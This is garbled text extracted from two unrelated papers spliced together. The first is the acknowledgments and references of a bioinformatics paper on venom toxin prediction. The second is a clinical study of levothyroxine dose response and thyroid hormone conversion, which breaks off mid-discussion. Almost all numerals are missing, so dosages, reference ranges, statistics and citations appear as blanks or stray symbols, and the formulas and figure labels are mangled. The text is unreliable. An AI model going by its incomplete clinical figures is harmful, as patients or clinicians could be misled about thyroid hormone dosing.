prof. dr. ana m. moura-da-silva who provided the unpublished anonymised snake venom transcriptome sequences. we also thank prof. j malcolm shick and prof. dr. john cullum for critically reviewing the manuscript. additional information and declarations funding this work was supported by the united kingdom medical research council (mrc grant g a). pfl is also supported as a visiting international research professor by the universidade de são paulo (usp grant . . . . ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.arachnoserver.org/spiderp.html http://www.arachnoserver.org/spiderp.html http://crdd.osdd.net/raghava/toxinpred/ http://www.clantox.cs.huji.ac.il/tech.php http://www.clantox.cs.huji.ac.il/tech.php http://www.csbio.sjtu.edu.cn/bioinf/predcsf/ http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: united kingdom medical research council: g a. universidade de são paulo: . . . . . competing interests the authors declare there are no competing interests. author contributions • ranko gacesa performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • david j. barlow analyzed the data, reviewed drafts of the paper. • paul f. long conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables. data availability the following information was supplied regarding data availability: the raw data has been supplied as a supplementary file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references altschul sf, madden tl, schäffer aa, zhang j, zhang z, miller w, lipman dj. . gapped blast and psi-blast: a new generation of protein database search programs. nucleic acids research : – doi . /nar/ . . . bairoch a, apweiler r. . the swiss-prot protein sequence database and its sup- plement tremblin . nucleic acids research : – doi . /nar/ . . . bateman a, martin mj, o’donovan c, magrane m, apweiler r, alpi e, antunes r, arganiska j, bely b, bingley m, bonilla c, britto r, bursteinas b, chavali g, cibrian-uhalte e, da silva a, de giorgi m, dogan t, fazzini f, gane p, castro lg, garmiri p, hatton-ellis e, hieta r, huntley r, legge d, liu w, luo j, macdougall a, mutowo p, nightingale a, orchard s, pichler k, poggioli d, pundir s, pureza l, qi g, rosanoff s, saidi r, sawford t, shypitsyna a, turner e, volynkin v, wardell t, watkins x, zellner h, cowley a, figueira l, li w, mcwilliam h, lopez r, xenarios i, bougueleret l, bridge a, poux s, redaschi n, aimo l, argoud-puy g, auchincloss a, axelsen k, bansal p, baratin d, blatter mc, boeckmann b, bolleman j, boutet e, breuza l, casal-casas c, de castro e, coudert e, cuche b, doche m, dornevil d, duvaud s, estreicher a, famiglietti l, feuermann m, gasteiger e, gehant s, gerritsen v, gos a, gruaz-gumowski n, hinz u, hulo c, jungo f, keller g, lara v, lemercier p, lieberherr d, lombardot t, martin x, masson p, morgat a, neto t, nouspikel n, paesano s, pedruzzi i, pilbout s, gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /peerj-cs. pozzato m, pruess m, rivoire c, roechert b, schneider m, sigrist c, sonesson k, staehli s, stutz a, sundaram s, tognolli m, verbregue l, veuthey al, wu ch, arighi cn, arminski l, chen c, chen y, garavelli js, huang h, laiho k, mcgarvey p, natale da, suzek be, vinayaka cr, wang q, wang y, yeh ls, yerramalla ms, zhang j. . uniprot: a hub for protein information. nucleic acids research :d –d doi . /nar/gku . bromberg y, yachdav g, ofran y, schneider r, rost b. . new in protein structure and function annotation: hotspots, single nucleotide polymorphisms and the ‘‘deep web’’. current opinion in drug discovery & development : – . camacho c, coulouris g, avagyan v, ma n, papadopoulos j, bealer k, madden tl. . blast+: architecture and applications. bmc bioinformatics : – doi . / - - - . chang d, duda tf. . extensive and continuous duplication facilitates rapid evolution and diversification of gene families. molecular biology and evolution : – doi . /molbev/mss . eddy sr. . accelerated profile hmm searches. plos computational biology :e doi . /journal.pcbi. . fan yx, song j, kong x, shen hb. . predcsf: an integrated feature-based approach for predicting conotoxin superfamily. protein & peptide letters : – doi . / . fry b. . from genome to ‘‘venome’’: molecular origin and evolution of the snake venom proteome inferred from phylogenetic analysis of toxin sequences and related body proteins. genome research : – doi . /gr. . gacesa r, chung r, dunn sr, weston aj, jaimes-becerra a, marques ac, morandini ac, hranueli d, starcevic a, ward m, long pf. . gene duplications are extensive and contribute significantly to the toxic proteome of nematocysts isolated from acropora digitifera (cnidaria: anthozoa: scleractinia). bmc genomics : doi . /s - - - . gupta s, kapoor p, chaudhary k, gautam a, kumar r, raghava gps. . in silico approach for predicting toxicity of peptides and proteins. plos one :e doi . /journal.pone. . hargreaves ad, swain mt, hegarty mj, logan dw, mulley jf. . restriction and recruitment—gene duplication and the origin and evolution of snake venom toxins. genome biology and evolution : – doi . /gbe/evu . jungo f, bougueleret l, xenarios i, poux s. . the uniprotkb/swiss-prot tox- prot program: a central hub of integrated venom protein data. toxicon : – doi . /j.toxicon. . . . junqueira-de-azevedo ilm, bastos cmv, ho pl, luna ms, yamanouye n, casewell nr. . venom-related transcripts from bothrops jararaca tissues provide novel molecular insights into the production and evolution of snake venom. molecular biology and evolution : – doi . /molbev/msu . kaas q, craik dj. . bioinformatics-aided venomics. toxins : – doi . /toxins . gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . / - - - http://dx.doi.org/ . /molbev/mss http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . / http://dx.doi.org/ . /gr. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /gbe/evu http://dx.doi.org/ . /j.toxicon. . . http://dx.doi.org/ . /molbev/msu http://dx.doi.org/ . /toxins http://dx.doi.org/ . /peerj-cs. kaplan n, morpurgo n, linial m. . novel families of toxin-like peptides in insects and mammals: a computational approach. journal of molecular biology : – doi . /j.jmb. . . . krogh a, brown m, mian is, sjölander k, haussler d. . hidden markov models in computational biology, applications to protein modeling. journal of molecular biology : – doi . /jmbi. . . li r, yu h, xing r, liu s, qing y, li k, li b, meng x, cui j, li p. . application of nanolc-ms/msto the shotgun proteomic analysis of the nematocyst proteins from jellyfish stomolophus meleagris. journal of chromatography b: analytical technologies in the biomedical and life sciences : – doi . /j.jchromb. . . . li r, yu h, xue w, yue y, liu s, xing r, li p. . jellyfish venomics and venom gland transcriptomics analysis of stomolophus meleagris to reveal the toxins associated with sting. journal of proteomics : – doi . /j.jprot. . . . liu g, zhou y, liu d, wang q, ruan z, he q, zhang l. . global transcriptome analysis of the tentacle of the jellyfish cyanea capillata using deep sequencing and expressed sequence tags: insight into the toxin-and degenerative disease-related transcripts. plos one : – doi . /journal.pone. . matthews bw. . comparison of the predicted and observed secondary structure of t phage lysozyme. bba—protein structure : – doi . / - ( ) - . neumann rs, kumar s, shalchian-tabrizi k. . blast output visualization in the new sequencing era. briefings in bioinformatics : – doi . /bib/bbt . powers d. . evaluation: from precision, recall and f-measure to roc., informedness, markedness & correlation. journal of machine learning technologies : – . rachamim t, morgenstern d, aharonovich d, brekhman v, lotan t, sher d. . the dynamically evolving nematocyst content of an anthozoan, a scyphozoan, and a hydrozoan. molecular biology and evolution : – doi . /molbev/msu . reyes-velasco j, card dc, andrew al, shaney kj, adams rh, schield dr, casewell nr, mackessy sp, castoe ta. . expression of venom gene homologs in diverse python tissues suggests a new model for the evolution of snake venom. molecular biology and evolution : – doi . /molbev/msu . schwartz ef, diego-garcia e, rodríguez de la vega rc, possani ld, whittington cm, papenfuss at, locke dp, mardis er, wilson rk, abubucker s, mitreva m, wong esw, hsu al, kuchel pw, belov k, warren wc, sher d, zlotkin e, knebel a, bsor t, nesher n, tal t, morgenstern d, cohen e, fishman y, zlotkin e, schwartz ef, diego-garcia e, rodríguez de la vega rc, possani ld, liu g, zhou y, liu d, wang q, ruan z, he q, zhang l. . transcriptome analysis of the venom gland of the mexican scorpion hadrurus gertschi (arachnida: scorpiones). toxicon : – doi . /journal.pone. . sher d, zlotkin e. . a hydra with many heads: protein and polypeptide toxins from hydra and their biological roles. toxicon : – doi . /j.toxicon. . . . gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jmb. . . http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . /j.jchromb. . . http://dx.doi.org/ . /j.jprot. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /bib/bbt http://dx.doi.org/ . /molbev/msu http://dx.doi.org/ . /molbev/msu http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.toxicon. . . http://dx.doi.org/ . /peerj-cs. starcevic a, long pf. . diversification of animal venom peptides-were jellyfish amongst the first combinatorial chemists? chembiochem : – doi . /cbic. . starcevic a, moura-da-silva am, cullum j, hranueli d, long pf. . combinations of long peptide sequence blocks can be used to describe toxin diversification in venomous animals. toxicon : – doi . /j.toxicon. . . . vonk fj, casewell nr, henkel cv, heimberg am, jansen hj, mccleary rjr, kerkkamp hme. . the king cobra genome reveals dynamic gene evolution and adaptation in the snake venom system. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. . weston aj, chung r, dunlap wc, morandini ac, marques ac, moura-da-silva am, ward m, padilla g, da silva lf, andreakis n, long pf. . proteomic characterisation of toxins isolated from nematocysts of the south atlantic jellyfish olindias sambaquiensis. toxicon : – doi . /j.toxicon. . . . weston aj, dunlap wc, shick jm, klueter a, iglic k, vukelic a, starcevic a, ward m, wells ml, trick cg, long pf. . a profile of an endosymbiont-enriched fraction of the coral stylophora pistillata reveals proteins relevant to microbial- host interactions. molecular & cellular proteomics :m . –m . doi . /mcp.m . . wheeler dl, church dm, federhen s, lash ae, madden tl, pontius ju, schuler gd, schrimi lm, sequerira e, tatusova ta, wagner l. . database resources of the national center for biotechnology. nucleic acids research : – doi . /nar/gkg . whittington cm, papenfuss at, locke dp, mardis er, wilson rk, abubucker s, mitreva m, wong esw, hsu al, kuchel pw, belov k, warren wc. . novel venom gene discovery in the platypus. genome biology :r doi . /gb- - - -r . wong esw, hardy mc, wood d, bailey t, king gf. . svm-based prediction of propeptide cleavage sites in spider toxins identifies toxin innovation in an australian tarantula. plos one :e doi . /journal.pone. . zdobnov em, apweiler r. . interproscan-an integration platform for the signature- recognition methods in interpro. bioinformatics (oxford, england) : – doi . /bioinformatics/ . . . gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cbic. http://dx.doi.org/ . /j.toxicon. . . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.toxicon. . . http://dx.doi.org/ . /mcp.m . http://dx.doi.org/ . /nar/gkg http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . /peerj-cs. doi: . /ec- e n d o cr in e c o n n e ct io n s research open access j e m midgley et al. response to l-t therapy – : variation in the biochemical response to l-thyroxine therapy and relationship with peripheral thyroid hormone conversion efficiency john e m midgley, rolf larisch , johannes w dietrich , and rudolf hoermann north lakes clinical, wheatley avenue, ilkley ls pt, uk department of nuclear medicine, klinikum luedenscheid, paulmannshoeher strasse , d- luedenscheid, germany medical department i, endocrinology and diabetology, bergmannsheil university hospitals, ruhr university of bochum, buerkle-de-la-camp-platz , d- bochum, germany ruhr center for rare diseases (ceser), ruhr university of bochum and witten/herdecke university, alexandrinenstraße , d- bochum, germany http://www.endocrineconnections.org doi: . /ec- � the authors published by bioscientifica ltd this work is l attribution-n correspondence should be addressed to r hoermann email rudolf.hoermann@gmail.com abstract several influences modulate biochemical responses to a weight-adjusted levothyroxine (l-t ) replacement dose. we conducted a secondary analysis of the relationship of l-t dose to tsh and free t (ft ), using a prospective observational study examining the interacting equilibria between thyroid parameters. we studied patients on steady-state l-t replacement for autoimmune thyroiditis or after surgery for malignant or benign thyroid disease. peripheral deiodinase activity was calculated as a measure of t –t conversion efficiency. in euthyroid subjects, the median l-t dose was . mg/kg per day (interquartile range (iqr) . , . ). the dose was independently associated with gender, age, aetiology and deiodinase activity (all p! . ). comparable ft levels required higher l-t doses in the carcinoma group (nz ), even after adjusting for different tsh levels. euthyroid athyreotic thyroid carcinoma patients (nz ) received . mg/kg per day l-t (iqr . , . ), compared to . mg/kg per day ( . , . ) in autoimmune thyroiditis (p! . , nz ) and . mg/kg per day ( . , . ) in patients operated on for benign disease (p! . , nz ). stratifying patients by deiodinase activity categories of ! , – and o nmol/s revealed an increasing ft –ft dissociation; the poorest converters showed the lowest ft levels in spite of the highest dose and circulating ft (p! . ). an l-t -related ft –tsh disjoint was also apparent; some patients with fully suppressed tsh failed to raise ft above the median level. these findings imply that thyroid hormone conversion efficiency is an important modulator of the biochemical response to l-t ; ft measurement may be an additional treatment target; and l-t dose escalation may have limited success to raise ft appropriately in some cases. key words " thyroid hormone replacement " l-t therapy " levothyroxine " tsh " triiodothyronine " deiodinase " conversion icen on endocrine connections ( ) , – introduction thyroid disorders are among the most prevalent diseases in the western world, affecting as many as one out of seven adults ( ). they are frequently associated with overt thyroid dysfunction, particularly various degrees of hypothyroidism that require thyroid hormone replace- ment ( , ). this is mainly done by administration of sed under a creative commons commercial . international license. http://www.endocrineconnections.org http://dx.doi.org/ . /ec- http://creativecommons.org/licenses/by-nc/ . / http://creativecommons.org/licenses/by-nc/ . / e n d o cr in e c o n n e ct io n s research j e m midgley et al. response to l-t therapy – : synthetic levothyroxine (l-t ), which is a well-established, convenient, safe and inexpensive treatment modality ( , ). however, this does not accurately reflect the natural direct secretion pattern of both thyroid hormones triiodothyronine (t ) and thyroxine (t ) by the thyroid gland ( , ). unlike other drugs, dosing of l-t is not fixed but has to be titrated according to individual needs. dose adequacy is mainly defined by reference to suitable biochemical standards, particularly thyrotropin (tsh) ( ). this parameter has evolved into the main treatment target to be monitored and kept within an assumed euthyroid range ( ). a number of studies have attempted to predict t requirement, and various regimes for a starting dose have been proposed based on an average of . mg/kg body weight (bw) or by more refined weight- or bmi-related algorithms ( , , , , , , ). although tsh measurement has dominated procedural management of thyroid replacement by its apparent ease and good standardisation, a disturbingly high proportion of patients remains unsatisfied with the treatment they receive ( , ). this has prompted some authors including our group to question the validity of relying on the tsh level as the sole measure of dose adequacy in l-t -treated patients ( , , ). we have shown that the homeostatic equilibria between tsh and peripheral thyroid hormones are modulated by various influences such as age, body mass and the treatment modality itself ( ). as a controlling element, the effective tsh level derived in a healthy normal population cannot necessarily be inferred to be equally optimal for a given patient on l-t medication, because the constitutive equilibria between tsh and thyroid hormones, especially ft , differ in health and disease ( ). in the present analysis, we examined the relationship of the l-t dose with clinical categories and bio- chemical outcomes such as tsh, ft and ft levels. we sought to define the interaction between tsh and the ft target and also to analyse the influences of modulators such as gender, age, disease category or the efficiency of t conversion from t . subjects and methods study design and objective an open prospective observational study (clinicaltrials.gov nct ) was conducted at the department of nuclear medicine at klinikum luedenscheid, germany, http://www.endocrineconnections.org doi: . /ec- � the authors published by bioscientifica ltd between july and february and approved by the ethics committee of the university of muenster, germany. participants gave written informed consent. the present secondary analysis is restricted to the subgroup of patients on steady l-t treatment, examining dose requirements of l-t including conditioning modu- lators, thyroid hormone conversion efficiency and relationships with biochemical outcomes such as tsh, ft and ft levels. the primary study outcome, namely the analysis of the interacting equilibria and interrelations between thyroid parameters under various conditioning influences such as gender, age and body mass and l-t treatment has already been reported ( ). patients the original study involved adult patients who were consecutively seen, were free of severe comorbidity and provided written informed consent. for this subgroup analysis, patients on thyroid hormone replacement meeting the following criteria were included: being seen as outpatients, presenting in a controlled functional state (ft r pmol/l and tsh % mu/l) and having reached a steady state on a constant l-t medication. although infrequently seen in an ambulatory setting, patients with severe non-thyroidal illness or potentially interfering comorbidities were ineligible to participate in the study. this exclusion extended to other conditions and the use of comedications that may interfere with the resorption or measurement of thyroid hormones or with pituitary tsh. patients with t /t combination therapy (nz ), anti-thyroid drug use (nz ), hypothalamic/pituitary diseases (nz ) or pregnancy (nz ) were excluded before analysis. diagnostic procedures included a detailed history, physical examination, standardised questionnaire docu- menting gender, age, height, weight, smoking habits ( % answered), prior surgery or radioiodine treatment, thyroid medication (brand, dosage, duration, time of intake), other drugs, laboratory tests (ft , ft , tsh and, if autoimmune thyroiditis was suspected or to be excluded, thyroid peroxidase antibodies (tpo-ab) or tsh-receptor antibodies (tsh-r ab)) and thyroid imaging. laboratory methods tsh, ft and ft were measured with an automated direct chemoluminescence method (advia centaur xp, siemens healthcare diagnostics, erlangen, germany). tsh is trace- able to the rd international standard for tsh (who, irp this work is licensed under a creative commons attribution-noncommercial . international license. http://www.endocrineconnections.org http://dx.doi.org/ . /ec- http://creativecommons.org/licenses/by-nc/ . / http://creativecommons.org/licenses/by-nc/ . / e n d o cr in e c o n n e ct io n s research j e m midgley et al. response to l-t therapy – : / ). a tsh range from . to mu/l was linear, and coefficient of variations of inter-assay imprecision ranged from . % to . %. reference intervals were laboratory established and pre-evaluated for the local population, using – pmol/l for ft , . – . pmol/l for ft and . – . mu/l for tsh ( ). tpo-abs were determined by a competitive chemo- luminescence method (advia centaur xp, siemens healthcare diagnostics, reference range ! u/ml) and tsh-r abs by competitive elisa (euroimmun ag, lübeck, germany, reference range ! u/l). ft –ft ratio and calculated deiodinase activity as measures of conversion efficiency, we calculated the ft –ft ratio by simple division of both parameters in pmol/l and the sum activity of peripheral deiodinases (spina-gd, termed ‘deiodinase activity,’ thereafter, nmol/s) from equilibrium levels of ft , ft and estimated constant parameters for plasma protein binding, distri- bution and elimination with ĝd z b ðkm cðft ÞÞð c k ðtbgÞÞðft Þ a ðft Þ nmol=s as previously described ( , , ). although the two measures are closely related in the linear part of the substrate relationship defined by michaelis-menten kinetics, only the more complex formula (gd) accounts for the saturation kinetics of the enzyme. in addition to using estimated deiodinase activity as a continuous variable, we divided deiodinase activity in three distinct categories defining poor (! nmol/s), intermediate ( – nmol/s) or good (o nmol/s) con- verters. the cut-offs were pre-specified based on obser- vations in l-t -treated patients vs healthy untreated subjects and in low (! ml) vs higher thyroid volumes ( ). they approximate turning points in the relationship between deiodinase activity and ft , defining a central region with a derivative of about and low or high regions with steeper slopes. thyroid ultrasound and scintigraphy thyroid volume was sonographically ( mhz transducer) determined according to the ellipsoid formula. reference values were ! ml for females and ! ml for males. a volume ! ml was considered athyreotic. larger nodules were further examined by scintigraphy. http://www.endocrineconnections.org doi: . /ec- � the authors published by bioscientifica ltd statistical methods descriptive data are reported as median plus interquartile range (iqr). we used wilcoxon’s rank sum or a c test in case of categorical variables for comparison of baseline characteristics. correlations are based on pearson’s product-moment when suitable or kendall’s t. multiple variables and conditional influences were analysed by a generalised linear model (glm) and approximated by a linear regression function over restricted intervals. b coefficients were derived from a linear model. tsh was used after logarithmic transformation. we tested for collinearity in the models using the variance inflation factor. a glm with a binomial function (logistic regression) was used to assess success rates of the l-t dose for reaching a tsh or ft target and to create dose- related probability plots. relative proportions were statistically compared by receiver operating characteristic curves and delong’s test. p values ! . were considered significant for all tests. statistical analyses were performed using deducer (version . - ) and the r statistical package (mac version . . ) ( , ). results the present analysis comprises patients in a stable controlled non-hypothyroid state on thyroid hormone replacement with l-t . patient characteristics are shown in table . of the total study group, patients were euthyroid according to ft , according to ft and according to tsh, based on their respective reference intervals with all displaying clinically satisfactory levels of medication. dose requirements associated with biochemical euthyroidism (nz ) defined by the reference ranges of all three parameters varied widely from to mg/day l-t (mean , median (iqr , )) or . to . mg/kg bw per day (mean . , median . (iqr . , . )). in univariate linear models, the l-t dose in the treated euthyroid panel was significantly associated with gender, age, body mass index, aetiology of disease, t –t ratio and calculated deiodinase activity (all p! . ) but not with tsh (pz . ). the influences remained indepen- dently predictive in a multivariable model (table ). tsh levels in the euthyroid range were unrelated to any of the above influences except disease category (pz . ), as might be expected considering the lower tsh target in malignant disease. deiodinase activity was positively associated with thyroid volume (tz . , this work is licensed under a creative commons attribution-noncommercial . international license. http://www.endocrineconnections.org http://dx.doi.org/ . /ec- http://creativecommons.org/licenses/by-nc/ . / http://creativecommons.org/licenses/by-nc/ . / table characteristics of study group (nz ). for referencing purpose, parameters in disease-free individuals from the same study were as follows: median age ( , ) years, tsh . ( . , . ) mu/l, ft . ( . , . ) pmol/l, ft . ( . , . ) pmol/l, calculated deiodinase activity . ( . , . ) nmol/s, thyroid volume ( , ) ml ( ). parameter median (iqr) or percentage gender (female, male) ( %), ( %) age (years) ( , ) in women vs men ( , ) vs ( , ), pz . disease aetiology (%) autoimmune thyroiditis % benign thyroid disease after surgery % thyroid carcinomaa % surgery, radioiodine treatment (%) %, % bmi (kg/m ) . ( . , . ) dose (mg/day) ( , ) weight-adjusted daily dose (mg/kg per day) . ( . , . ) tsh (mu/l) . ( . , . ) ft (pmol/l) . ( . , . ) ft (pmol/l) . ( . , . ) tpo-ab (u/l) ( , ), positive %, nz ft –ft ratio . ( . , . ) deiodinase activity (nmol/s) . ( . , . ) thyroid volume (ml) – total group ( , ) autoimmune thyroiditis ( , ) benign thyroid disease post surgery ( , ) thyroid carcinomab ( , ) a % of the thyroid carcinoma patients had a higher tnm stage than . b % had no detectable residual thyroid volume by ultrasound after total thyroidectomy and radioiodine treatment. table b coefficients in a linear model of covariates predicting dose of l-t in the euthyroid panel. the multivariable model was simultaneously fitted with the parameters listed, all of which were significant predictors of the l-t dose in univariate models. all variance inflations factors were ! . . variable b coefficient ( % ci) gender male vs female . ( . , . ), p! . disease aetiology autoimmune vs malignant disease k . (k . , k . ), p! . benign goitre vs malignant disease k . (k . , k . ), p! . age k . (k . , k . ), p! . bmi . ( . , . ), p! . deiodinase activity k . (k . , k . ), p! . e n d o cr in e c o n n e ct io n s research j e m midgley et al. response to l-t therapy – : p! . , nz ) but inversely correlated with weight- adjusted l-t dose (rzk . , p! . , nz ). in a biochemically defined euthyroid state excluding subclinically hyperthyroid subjects, athyreotic thyroid carcinoma patients received significantly higher doses of l-t ( . mg/kg bw per day (iqr . , . ), nz )) than patients with autoimmune thyroiditis ( . mg/kg bw per day (iqr . , . ), nz , p! . )) or benign thyroid disease post surgery ( . mg/kg bw per day (iqr . , . ), nz , p! . )). furthermore, after adjusting for differing levels of tsh suppression in a linear model the weight-adjusted l-t dose was higher in athyreotic carcinoma patients compared to autoimmune thyroiditis or benign disease (p! . , fig. a). similarly, the dose required to achieve the same ft concentration was higher in the carcinoma group (p! . , fig. b). median thyroid volume was ml (iqr , ml) in carcinomas, ml (iqr , ml) in autoimmune thyroiditis and ml (iqr , ml) in benign goitre post surgery. the weight-adjusted l-t dose was inversely correlated with the thyroid volume in the three diagnostic groups (rzk . , pz . , nz ). three distinct categories of conversion efficiency were defined (see subjects and methods) as follows: poor converters ! nmol/s, intermediate converters http://www.endocrineconnections.org doi: . /ec- � the authors published by bioscientifica ltd – nmol/s and good converters o nmol/s deiodi- nase activity. the poor converters reached significantly (p! . ) higher ft concentrations in the circulation than intermediate or good converters but, at the same time, showed significantly (p! . ) lower absolute ft levels compared to the other two groups (fig. ). while the ft –ft dissociation was apparent in all three disease entities, it was most pronounced in the carcinoma group (nz , fig. ). the latter group showed the highest this work is licensed under a creative commons attribution-noncommercial . international license. http://www.endocrineconnections.org http://dx.doi.org/ . /ec- http://creativecommons.org/licenses/by-nc/ . / http://creativecommons.org/licenses/by-nc/ . / − − − a b l−t dose (µg/kg bw/d) ln t s h ( m u /l ) disease carcinoma ait goitre l−t dose (µg/kg bw/d) f t ( p m o l/ l) disease carcinoma ait goitre figure tsh (a) or ft (b) vs weight-adjusted l-t dose in three groups of patients on thyroid hormone replacement, with autoimmune thyroiditis (nz ), after surgery for benign goitre (nz ) or thyroid carcinoma (nz ). between group differences in both panels were significant (p! . ) and remained so after adjusting for volume (not shown, p! . ), as evidenced by linear models with the diagnostic group as a covariate. see text for further details. ait, autoimmune thyroiditis; goitre, goitre post surgery for benign nodular thyroid disease. a b c carcinoma ait goitre f t ( p m o l/ l) ** ** *** ** ** carcinoma ait goitre f t ( p m o l/ l) ** ** ** ** ** ** – – – carcinoma ait goitre ln t s h ( m u /l ) n n n figure ft (a), ft (b) and tsh (c) levels in l-t -treated patients stratified by disease and conversion efficiency. the disease entities were closely associated with categories of the thyroid volume (see table and text). the red box refers to poor converters (calculated deiodinase activity ! nmol/s), green to intermediate converters (deiodinase activity – nmol/s) and blue to good converters (deiodinase activity o nmol/s). remarkably, absolute ft concentrations were lowest in the poor converter group in all disease categories, while ft levels were highest in the poor converters. wilcoxon test, revealed significant differences compared to each first group; *p! . , **p! . . ait, autoimmune thyroiditis; goitre, goitre post surgery for benign nodular thyroid disease. e n d o cr in e c o n n e ct io n s research j e m midgley et al. response to l-t therapy – : proportion of poor converters (fig. ). the converter groups were similar (po . ) in their age, bmi, weight- adjusted l-t dose and tsh levels except for men being overrepresented in the good converter group (p! . ). converter categories of the carcinoma group were comparable (pz . ) in their thyroid residual volumes, which were below ml in % of all cases. in contrast, in the combined group of benign diseases the converter status was significantly associated with thyroid volume ( ( , ) vs ( , ) vs ( , ) ml, pz . ). thyroid volumes differed between the carcinoma group and the benign diseases (p! . ) but not between autoimmune thyroiditis and goitre post surgery (pz . , table ). http://www.endocrineconnections.org doi: . /ec- � the authors published by bioscientifica ltd this work is licensed under a creative commons attribution-noncommercial . international license. http://www.endocrineconnections.org http://dx.doi.org/ . /ec- http://creativecommons.org/licenses/by-nc/ . / http://creativecommons.org/licenses/by-nc/ . / l–t dose (µg/kg bw/d) p ro b a b ili ty o f t s h s u p p re ss io n . . . . . a b . . . . . . p m o l/l . . e n d o cr in e c o n n e ct io n s research j e m midgley et al. response to l-t therapy – : a given weight-adjusted dose suppressed the tsh below the lower reference limit (! . mu/l) in a higher proportion of carcinoma patients, than it raised their ft level above the median level typical of the euthyroid controls (o pmol/l) (fig. a and b). conversely, much lower doses reached a target of a fully suppressed tsh compared to the ft median (fig. a and b). the same tendency is true for a more modest target below mu/l for tsh in autoimmune thyroiditis or benign disease post surgery, although variation was higher in this panel (fig. c and d). overall, a significantly higher proportion of patients achieved tsh suppression compared to ft above median by delong’s test employing receiver operating characteristic curves (p! . ). c d l–t dose (µg/kg bw/d) p ro b a b ili ty o f f t > . . . . . . . . . l–t dose (µg/kg bw/d) p ro b a b ili ty o f t s h < m u /l . . . . . . . . . . . . . l–t dose (µg/kg bw/d) p ro b a b ili ty o f f t > p m o l/l . . . . . . . . . . . . figure probability plot of weight adjusted l-t dose to (a) suppress tsh below its lower reference limit ( . mu/l) or (b) raise ft above the median of euthyroid controls (o pmol/l) in the carcinoma patients (nz ), and (c) suppress tsh ! mu/l or (d) elevate ft above pmol/l in benign disease (patients with autoimmune thyroiditis, nz and nodular thyroid disease post surgery, nz ). probability plots were created by logistic regression. the shaded areas indicate the confidence interval surrounding the fitted curve. the tsh targets were more frequently reached at a lower dose than the ft target (see results). discussion in this cohort, dose requirements for l-t -treated patients varied in a large euthyroid panel and were associated with many influences including gender, age, disease category and thyroid hormone conversion efficiency. however, not all of the treatment conditions necessarily aim at a biochemically euthyroid thyroid state as a comprehensive therapeutical goal, as defined by maintaining the respect- ive reference ranges of all three parameters: tsh, ft and ft . particularly, in the treatment of thyroid carcinomas, for many patients in our sample the target was a lower or suppressed tsh below the reference range, which, as a consequence, raised ft levels above the upper reference range in a proportion of these patients. at both com- parable levels of tsh suppression or similar ft concen- trations, athyreotic thyroid carcinoma patients were taking a higher weight-adjusted dose of l-t . three remarkable and linked observations from this study were a dissociation between ft and ft , an apparent disjoint between tsh and ft and an inverse association between l-t dose and conversion efficiency. the present study was a cross-sectional secondary analysis not involving a randomised design. as previously reported in a separate communication ( ), the primary aim of this prospective observational study was to analyse further the interacting equilibria. while introducing some uncontrolled variations, this allowed for the study of a broader natural spectrum of responses, as observed in consecutive patients. ft or ft measurements were not compromised in any way by problematic conditions such as the non-thyroid illness syndrome, as the study was conducted in a cohort of otherwise ‘healthy’ out-patients without relevant comorbidity. there was no evidence for a potential bias stemming from a variable time interval http://www.endocrineconnections.org doi: . /ec- � the authors published by bioscientifica ltd this work is licensed under a creative commons attribution-noncommercial . international license. http://www.endocrineconnections.org http://dx.doi.org/ . /ec- http://creativecommons.org/licenses/by-nc/ . / http://creativecommons.org/licenses/by-nc/ . / e n d o cr in e c o n n e ct io n s research j e m midgley et al. response to l-t therapy – : between l-t intake and blood sampling, which might result in an expected slight temporary elevation of circulating ft concentrations, as previously discussed ( ). there were neither linear (pz . ) nor non-linear (pz . ) relationships with deiodinase activity. in l-t treatment, equilibria typical of the healthy state were found not to be invariant, but profoundly altered ( ). here we disclose further consequences that are associated with alterations in the regulatory patterns in patients under l-t therapy. in particular, one aspect relates to the l-t dose and conversion efficiency. we estimated t –t conversion by calculating the sum activity of peripheral deiodinases (see subjects and methods). the measure is similar to the ft –ft ratio, albeit more precise wherein it accounts for non-linear enzyme saturation kinetics. however, it does not further differentiate global activity by type of deiodinase. thus, the source of t or contribution of various tissues to the t plasma pool cannot be discerned. we found that a poor converter status was associated with a higher l-t dose and higher serum ft levels but still lower absolute ft concentrations, compared to the more efficient converters. this paradoxically relates the higher t supply to a worsened rather than improved absolute ft level. this is not to say that an increasing dose will not raise on average the ft but that the dose response varies widely among individuals, and conversion ineffi- ciency in some patients may outweigh the dose effect in terms of achievable absolute ft concentrations. how can this be explained? a high l-t dose may not invariably remedy t deficiency owing to t -induced conversion inefficiency but could actually hinder its attainment through the inhibitory actions of the substrate itself and/or reverse t (rt ) on deiodinase type activity ( ). a study by cettour-rose et al. ( ) confirmed that rt , when infused into rats, inhibited deiodinase type activity in the pituitary, cerebral cortex and brown adipose tissue, but interestingly, this did not have much impact on circulating t , t and tsh concentrations in the animals. however, in this model the rt effect was studied under rather artificial conditions in the absence of an abundant t supply with elevated ft levels that characterizes the treatment situation. 